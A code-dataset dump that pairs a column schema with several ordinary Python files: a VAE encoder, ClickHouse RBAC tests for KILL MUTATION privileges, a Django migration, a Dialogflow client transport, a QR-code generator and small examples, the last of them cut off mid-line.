Dataset schema (one row per source file; ⌀ marks nullable columns):

| column | dtype | values |
|---|---|---|
| hexsha | string | lengths 40–40 |
| size | int64 | 4–1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 4–209 |
| max_stars_repo_name | string | lengths 5–121 |
| max_stars_repo_head_hexsha | string | lengths 40–40 |
| max_stars_repo_licenses | list | lengths 1–10 |
| max_stars_count | int64 | 1–191k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | lengths 24–24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | lengths 24–24 ⌀ |
| max_issues_repo_path | string | lengths 4–209 |
| max_issues_repo_name | string | lengths 5–121 |
| max_issues_repo_head_hexsha | string | lengths 40–40 |
| max_issues_repo_licenses | list | lengths 1–10 |
| max_issues_count | int64 | 1–67k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | lengths 24–24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | lengths 24–24 ⌀ |
| max_forks_repo_path | string | lengths 4–209 |
| max_forks_repo_name | string | lengths 5–121 |
| max_forks_repo_head_hexsha | string | lengths 40–40 |
| max_forks_repo_licenses | list | lengths 1–10 |
| max_forks_count | int64 | 1–105k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | lengths 24–24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | lengths 24–24 ⌀ |
| content | string | lengths 4–1.02M |
| avg_line_length | float64 | 1.07–66.1k |
| max_line_length | int64 | 4–266k |
| alphanum_fraction | float64 | 0.01–1 |
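Each record that follows is one source file with these columns. As a minimal sketch of how such records might be read, assuming a Hugging Face `datasets`-style export: the dataset name below is only a placeholder, and the exact formulas behind `avg_line_length` and `alphanum_fraction` are not stated in this dump, so the recomputation is a plausible reconstruction rather than the definitive one.

```python
# Minimal sketch: stream a few records with the schema above and re-derive the
# per-file statistics columns from `content`.
# Assumptions: a `datasets`-compatible export; "your-org/code-dataset" is a placeholder name.
from itertools import islice

from datasets import load_dataset

ds = load_dataset("your-org/code-dataset", split="train", streaming=True)

for record in islice(ds, 3):
    print(record["hexsha"], record["max_stars_repo_name"], record["max_stars_repo_path"])

    # Plausible reconstructions of the derived columns (definitions not confirmed here).
    text = record["content"]
    lines = text.splitlines()
    avg_line_length = sum(len(line) for line in lines) / max(len(lines), 1)
    alphanum_fraction = sum(ch.isalnum() for ch in text) / max(len(text), 1)

    print(record["size"], round(avg_line_length, 6), round(alphanum_fraction, 6))
```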
hexsha: cfebdc0f6cd106411e690aa30a03ad7d8289dd06 | size: 251 | ext: py | lang: Python
max_stars: path=pynovice/gaode_map/__init__.py, repo=wqwangchn/novice, head=d52190a9cd5045726e49aff8610b718636c304c7, licenses=["MIT"], count=2, event_min=2020-06-28T08:30:47.000Z, event_max=2020-11-04T07:55:42.000Z
max_issues: path=pynovice/gaode_map/__init__.py, repo=wqwangchn/novice, head=d52190a9cd5045726e49aff8610b718636c304c7, licenses=["MIT"], count=8, event_min=2020-11-13T18:56:02.000Z, event_max=2022-02-10T03:16:52.000Z
max_forks: path=pynovice/gaode_map/__init__.py, repo=wqwangchn/novice, head=d52190a9cd5045726e49aff8610b718636c304c7, licenses=["MIT"], count=2, event_min=2020-09-17T00:12:36.000Z, event_max=2020-11-04T07:55:55.000Z
content:
# coding=utf-8
# /usr/bin/env python
'''
Author: wenqiangw
Email: wenqiangw@opera.com
Date: 2020-07-28 15:07
Desc: data distribution plotting
'''
from .trajectory_playback import Trajectory as Trajectory_his
from .trajectory_playback_v2 import Trajectory as Trajectory
avg_line_length: 19.307692 | max_line_length: 61 | alphanum_fraction: 0.784861

hexsha: 9996b6f808a2cba8342baf6f3ae3984a2648f8f7 | size: 3,616 | ext: py | lang: Python
max_stars: path=src/models/encoders.py, repo=dbarrejon/Shi-VAE, head=b6f2c92e40d3585274dc7586e3b36d8ca45624aa, licenses=["MIT"], count=4, event_min=2021-03-17T01:55:00.000Z, event_max=2021-11-02T10:02:28.000Z
max_issues: path=src/models/encoders.py, repo=dbarrejon/Shi-VAE, head=b6f2c92e40d3585274dc7586e3b36d8ca45624aa, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=src/models/encoders.py, repo=dbarrejon/Shi-VAE, head=b6f2c92e40d3585274dc7586e3b36d8ca45624aa, licenses=["MIT"], count=null, event_min=null, event_max=null
content:
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright (c) 2021. by Daniel Barrejon, UC3M. +
# All rights reserved. This file is part of the Shi-VAE, and is released under the +
# "MIT License Agreement". Please see the LICENSE file that should have been included +
# as part of this package. +
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from abc import ABC
import torch
import torch.nn as nn
from lib import utils
from lib.aux import set_device
from models import samplers
class GMEncoder(nn.Module, ABC):
r"""
Encoder for the Shi-VAE, with two latent codes: :math:`z` (real) and :math:`s` (discrete).
"""
def __init__(self, x_dim, z_dim, s_dim, h_dim, activation_layer='ReLU'):
r"""
Args:
x_dim (int): Dimensionality of x.
z_dim (int): Dimensionality of :math:`z`.
s_dim (int): Dimensionality of :math:`s`.
h_dim (int): Dimensionality of the embedding space for the LSTM.
activation_layer (string): Choose "relu", "tanh" or "sigmoid".
"""
super(GMEncoder, self).__init__()
self.h_dim = h_dim
self.x_dim = x_dim
self.z_dim = z_dim
self.s_dim = s_dim
self.device = set_device()
self.activation = utils.set_activation_layer(activation_layer)
# Sampler
self.sampler = samplers.Sampler()
# Gumbel Softmax for discrete latent variable: s
self.gs_sampler = samplers.GumbelSoftmaxSampler()
# Feature extraction
self.phi_x = nn.Sequential(
nn.Linear(self.x_dim, self.h_dim),
self.activation,
nn.Linear(self.h_dim, self.h_dim),
self.activation)
self.phi_x_s = nn.Sequential(
nn.Linear(self.x_dim + self.h_dim, self.h_dim),
self.activation,
nn.Linear(self.h_dim, self.s_dim),
nn.LeakyReLU(negative_slope=0.01))
# Encoder
self.enc = nn.Sequential(
nn.Linear(self.h_dim + self.h_dim + self.s_dim, self.h_dim), # add s_dim
self.activation,
nn.Linear(self.h_dim, self.h_dim),
self.activation)
self.enc_mean = nn.Linear(self.h_dim, self.z_dim)
self.enc_std = nn.Sequential(
nn.Linear(self.h_dim, self.z_dim),
nn.Softplus())
def forward(self, x_t, h_past, temp=3):
r"""
Forward pass.
Args:
x_t (Tensor): Shape (BxD)
h_past (Tensor): Shape (Bxh_dim)
temp (int): Temperature value for the Gumbel Softmax sampler.
Returns:
z_pack: Tuple with sample z, z mean and z std.
s_pack: Tuple with sample s and s probs.
"""
phi_x_t = self.phi_x(x_t)
phi_x_t_s = self.phi_x_s(torch.cat([x_t, h_past], 1)) # v2: z_t prior for s_t+1
# s_t
s_t_logits = phi_x_t_s
s_t_probs = torch.nn.functional.softmax(s_t_logits, dim=1) # probs Categorical
s_t = self.gs_sampler.gumbel_softmax(s_t_logits, temp, one_hot=False)
s_pack = (s_t, s_t_probs)
enc_t = self.enc(torch.cat([phi_x_t, s_t, h_past], 1))
# moments
z_t_mean = self.enc_mean(enc_t)
z_t_std = self.enc_std(enc_t)
# sample
z_t = self.sampler.reparameterized_sample(z_t_mean, z_t_std)
z_pack = (z_t, z_t_mean, z_t_std)
return z_pack, s_pack
avg_line_length: 36.525253 | max_line_length: 90 | alphanum_fraction: 0.551438

hexsha: 41d4a837480486e392e325f7e33f7190ea59fdf7 | size: 11,090 | ext: py | lang: Python
max_stars: path=tests/testflows/rbac/tests/privileges/kill_mutation.py, repo=edani/ClickHouse, head=17a8a4e9664fabed5b370b37e148139ba698acf5, licenses=["Apache-2.0"], count=18, event_min=2021-05-29T01:12:33.000Z, event_max=2021-11-18T12:34:48.000Z
max_issues: path=tests/testflows/rbac/tests/privileges/kill_mutation.py, repo=edani/ClickHouse, head=17a8a4e9664fabed5b370b37e148139ba698acf5, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_forks: path=tests/testflows/rbac/tests/privileges/kill_mutation.py, repo=edani/ClickHouse, head=17a8a4e9664fabed5b370b37e148139ba698acf5, licenses=["Apache-2.0"], count=2, event_min=2021-07-13T06:42:45.000Z, event_max=2021-07-21T13:47:22.000Z
content:
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
def no_privilege(self, node=None):
"""Check that user doesn't need privileges to execute `KILL MUTATION` with no mutations.
"""
if node is None:
node = self.context.node
with Scenario("kill mutation on a table"):
user_name = f"user_{getuid()}"
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with user(node, user_name):
with When("I attempt to kill mutation on table"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("kill mutation on cluster"):
user_name = f"user_{getuid()}"
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with user(node, user_name):
with When("I attempt to kill mutation on cluster"):
node.query(f"KILL MUTATION ON CLUSTER sharded_cluster WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
@TestSuite
def privileges_granted_directly(self, node=None):
"""Check that a user is able to execute `KILL MUTATION` on a table with a mutation
if and only if the user has privilege matching the source of the mutation on that table.
For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs `ALTER UPDATE` privilege.
"""
user_name = f"user_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Suite(test=update, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=user_name)
Suite(test=delete, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=user_name)
Suite(test=drop_column, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=user_name)
@TestSuite
def privileges_granted_via_role(self, node=None):
"""Check that a user is able to execute `KILL MUTATION` on a table with a mutation
if and only if the user has privilege matching the source of the mutation on that table.
For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs `ALTER UPDATE` privilege.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Suite(test=update, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=role_name)
Suite(test=delete, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=role_name)
Suite(test=drop_column, setup=instrument_clickhouse_server_log)(user_name=user_name, grant_target_name=role_name)
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation_AlterUpdate("1.0")
)
def update(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER UPDATE`
if and only if the user has `ALTER UPDATE` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Scenario("KILL ALTER UPDATE without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
with Scenario("KILL ALTER UPDATE with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("KILL ALTER UPDATE with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER UPDATE privilege"):
node.query(f"REVOKE ALTER UPDATE ON {table_name} FROM {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDelete("1.0")
)
def delete(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER DELETE`
if and only if the user has `ALTER DELETE` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Scenario("KILL ALTER DELETE without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
with Scenario("KILL ALTER DELETE with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("KILL ALTER DELETE with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER DELETE privilege"):
node.query(f"REVOKE ALTER DELETE ON {table_name} FROM {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDropColumn("1.0")
)
def drop_column(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER DROP COLUMN`
if and only if the user has `ALTER DROP COLUMN` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Scenario("KILL ALTER DROP COLUMN without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
with Scenario("KILL ALTER DROP COLUMN with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)])
with Scenario("KILL ALTER DROP COLUMN with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER DROP COLUMN privilege"):
node.query(f"REVOKE ALTER DROP COLUMN ON {table_name} FROM {grant_target_name}")
with When("I try to KILL MUTATION"):
node.query(f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'", settings = [("user", user_name)],
exitcode=exitcode, message="Exception: Not allowed to kill mutation.")
@TestFeature
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation("1.0"),
)
@Name("kill mutation")
def feature(self, node="clickhouse1", stress=None, parallel=None):
"""Check the RBAC functionality of KILL MUTATION.
"""
self.context.node = self.context.cluster.node(node)
if parallel is not None:
self.context.parallel = parallel
if stress is not None:
self.context.stress = stress
Suite(run=no_privilege, setup=instrument_clickhouse_server_log)
Suite(run=privileges_granted_directly, setup=instrument_clickhouse_server_log)
Suite(run=privileges_granted_via_role, setup=instrument_clickhouse_server_log)
avg_line_length: 43.151751 | max_line_length: 163 | alphanum_fraction: 0.656267

hexsha: 6a14d4b03e056ca4ff90571a80e1e0f92a0c932a | size: 545 | ext: py | lang: Python
max_stars: path=importer/migrations/0008_campaigntaskdetails_project.py, repo=juliecentofanti172/juliecentofanti.github.io, head=446ea8522b9f4a6709124ebb6e0f675acf7fe205, licenses=["CC0-1.0"], count=134, event_min=2018-05-23T14:00:29.000Z, event_max=2022-03-10T15:47:53.000Z
max_issues: path=importer/migrations/0008_campaigntaskdetails_project.py, repo=ptrourke/concordia, head=56ff364dbf38cb8a763df489479821fe43b76d69, licenses=["CC0-1.0"], count=1,104, event_min=2018-05-22T20:18:22.000Z, event_max=2022-03-31T17:28:40.000Z
max_forks: path=importer/migrations/0008_campaigntaskdetails_project.py, repo=ptrourke/concordia, head=56ff364dbf38cb8a763df489479821fe43b76d69, licenses=["CC0-1.0"], count=32, event_min=2018-05-22T20:22:38.000Z, event_max=2021-12-21T14:11:44.000Z
content:
# Generated by Django 2.0.8 on 2018-09-20 20:05
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("importer", "0007_auto_20180917_1654")]
operations = [
migrations.AddField(
model_name="campaigntaskdetails",
name="project",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="concordia.Project",
),
)
]
avg_line_length: 24.772727 | max_line_length: 60 | alphanum_fraction: 0.59633

hexsha: 5f6b6182b98c553b844a23464fb14483cf25c5c3 | size: 10,025 | ext: py | lang: Python
max_stars: path=google/cloud/dialogflow_v2/services/participants/transports/base.py, repo=rogers140/python-dialogflow, head=d9ce91f8590947736560727624fbc0846601ce1c, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_issues: path=google/cloud/dialogflow_v2/services/participants/transports/base.py, repo=rogers140/python-dialogflow, head=d9ce91f8590947736560727624fbc0846601ce1c, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
max_forks: path=google/cloud/dialogflow_v2/services/participants/transports/base.py, repo=rogers140/python-dialogflow, head=d9ce91f8590947736560727624fbc0846601ce1c, licenses=["Apache-2.0"], count=null, event_min=null, event_max=null
content:
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.dialogflow_v2.types import participant
from google.cloud.dialogflow_v2.types import participant as gcd_participant
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-dialogflow",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class ParticipantsTransport(abc.ABC):
"""Abstract transport class for Participants."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
)
DEFAULT_HOST: str = "dialogflow.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_participant: gapic_v1.method.wrap_method(
self.create_participant, default_timeout=None, client_info=client_info,
),
self.get_participant: gapic_v1.method.wrap_method(
self.get_participant, default_timeout=None, client_info=client_info,
),
self.list_participants: gapic_v1.method.wrap_method(
self.list_participants, default_timeout=None, client_info=client_info,
),
self.update_participant: gapic_v1.method.wrap_method(
self.update_participant, default_timeout=None, client_info=client_info,
),
self.analyze_content: gapic_v1.method.wrap_method(
self.analyze_content,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=220.0,
),
default_timeout=220.0,
client_info=client_info,
),
self.suggest_articles: gapic_v1.method.wrap_method(
self.suggest_articles, default_timeout=None, client_info=client_info,
),
self.suggest_faq_answers: gapic_v1.method.wrap_method(
self.suggest_faq_answers, default_timeout=None, client_info=client_info,
),
}
@property
def create_participant(
self,
) -> Callable[
[gcd_participant.CreateParticipantRequest],
Union[gcd_participant.Participant, Awaitable[gcd_participant.Participant]],
]:
raise NotImplementedError()
@property
def get_participant(
self,
) -> Callable[
[participant.GetParticipantRequest],
Union[participant.Participant, Awaitable[participant.Participant]],
]:
raise NotImplementedError()
@property
def list_participants(
self,
) -> Callable[
[participant.ListParticipantsRequest],
Union[
participant.ListParticipantsResponse,
Awaitable[participant.ListParticipantsResponse],
],
]:
raise NotImplementedError()
@property
def update_participant(
self,
) -> Callable[
[gcd_participant.UpdateParticipantRequest],
Union[gcd_participant.Participant, Awaitable[gcd_participant.Participant]],
]:
raise NotImplementedError()
@property
def analyze_content(
self,
) -> Callable[
[gcd_participant.AnalyzeContentRequest],
Union[
gcd_participant.AnalyzeContentResponse,
Awaitable[gcd_participant.AnalyzeContentResponse],
],
]:
raise NotImplementedError()
@property
def suggest_articles(
self,
) -> Callable[
[participant.SuggestArticlesRequest],
Union[
participant.SuggestArticlesResponse,
Awaitable[participant.SuggestArticlesResponse],
],
]:
raise NotImplementedError()
@property
def suggest_faq_answers(
self,
) -> Callable[
[participant.SuggestFaqAnswersRequest],
Union[
participant.SuggestFaqAnswersResponse,
Awaitable[participant.SuggestFaqAnswersResponse],
],
]:
raise NotImplementedError()
__all__ = ("ParticipantsTransport",)
avg_line_length: 36.856618 | max_line_length: 103 | alphanum_fraction: 0.648978

hexsha: fd8fca7e72aff6669420718c024b098b45600dc8 | size: 479 | ext: py | lang: Python
max_stars: path=data_structures/array/array_string.py, repo=Nobodylesszb/python_module, head=37d2cdcf89a3ff02a9e560696a059cec9272bd1f, licenses=["MIT"], count=null, event_min=null, event_max=null
max_issues: path=data_structures/array/array_string.py, repo=Nobodylesszb/python_module, head=37d2cdcf89a3ff02a9e560696a059cec9272bd1f, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=data_structures/array/array_string.py, repo=Nobodylesszb/python_module, head=37d2cdcf89a3ff02a9e560696a059cec9272bd1f, licenses=["MIT"], count=null, event_min=null, event_max=null
content:
# The array module defines a sequence data structure very much like a list,
# except that all members must have the same basic type.
# The supported types are all numeric or other fixed-size basic types, such as bytes.
import array
import binascii
s = b'This is the array.'
a = array.array('b', s)
print('As byte string:', s)
print('As array :', a)
print('As hex :', binascii.hexlify(a))
"""
As byte string: b'This is the array.'
As array : array('b', [84, 104, 105, 115, 32, 105, 115, 32, 116, 104, 101, 32, 97, 114, 114, 97, 121, 46])
As hex : b'54686973206973207468652061727261792e'
"""
avg_line_length: 26.611111 | max_line_length: 111 | alphanum_fraction: 0.649269

hexsha: bae2ffb46278c08c3bdcf07190687485f82cbd11 | size: 1,137 | ext: py | lang: Python
max_stars: path=sa-fastapi/qr-code-fs-atom/scripted-atom/scripts/qr_generator.py, repo=piximos/scripted-atoms, head=6156803e2512bec11ed0403121b9e7f9bf019d99, licenses=["MIT"], count=2, event_min=2020-12-21T20:49:26.000Z, event_max=2021-12-23T16:04:48.000Z
max_issues: path=sa-fastapi/qr-code-s3-atom/scripted-atom/scripts/qr_generator.py, repo=piximos/scripted-atoms, head=6156803e2512bec11ed0403121b9e7f9bf019d99, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=sa-fastapi/qr-code-s3-atom/scripted-atom/scripts/qr_generator.py, repo=piximos/scripted-atoms, head=6156803e2512bec11ed0403121b9e7f9bf019d99, licenses=["MIT"], count=null, event_min=null, event_max=null
content:
import os
import qrcode
from re import match
class QrGenerator:
@staticmethod
def generate_qr(data: str, qr_id: str, color_fill: str = None, color_bg: str = None):
QrGenerator.test_hex_value(color_fill)
QrGenerator.test_hex_value(color_bg)
qr_dir = os.getenv('QR_TMP_FOLDER')
os.makedirs(qr_dir, exist_ok=True)
qr_path = "{}/{}.png".format(qr_dir, qr_id)
qr = qrcode.QRCode(
version=3,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=25,
border=3,
)
qr.add_data(data)
qr.make(fit=True)
img = qr.make_image(fill_color=os.getenv(
'SA_QR_FILL_COLOR') if not color_fill else color_fill, back_color=os.getenv(
'SA_QR_BACKGROUND_COLOR') if not color_bg else color_bg)
img.save(qr_path)
return qr_path
@staticmethod
def test_hex_value(hex: str = None):
if hex is not None and not match("^\#[a-fA-F0-9]{6}$", hex):
raise TypeError("Passed hex color does not match the following pattern : {}".format("^\#[a-fA-F0-9]{6}$"))
avg_line_length: 31.583333 | max_line_length: 118 | alphanum_fraction: 0.619173

hexsha: 1a3e2506f9910819ddc1eb4222619fa09df838f5 | size: 403 | ext: py | lang: Python
max_stars: path=arc/075/d.py, repo=wotsushi/competitive-programming, head=17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86, licenses=["MIT"], count=3, event_min=2019-06-25T06:17:38.000Z, event_max=2019-07-13T15:18:51.000Z
max_issues: path=arc/075/d.py, repo=wotsushi/competitive-programming, head=17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86, licenses=["MIT"], count=null, event_min=null, event_max=null
max_forks: path=arc/075/d.py, repo=wotsushi/competitive-programming, head=17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86, licenses=["MIT"], count=null, event_min=null, event_max=null
content:
from math import ceil
# Input
N, A, B = map(int, input().split())
h = [int(input()) for _ in range(N)]
# Find the answer by bisection
def bis(p, ok, ng):
mid = (ok + ng) // 2
return (
ok if abs(ok - ng) == 1 else
bis(p, mid, ng) if p(mid) else
bis(p, ok, mid)
)
ans = bis(
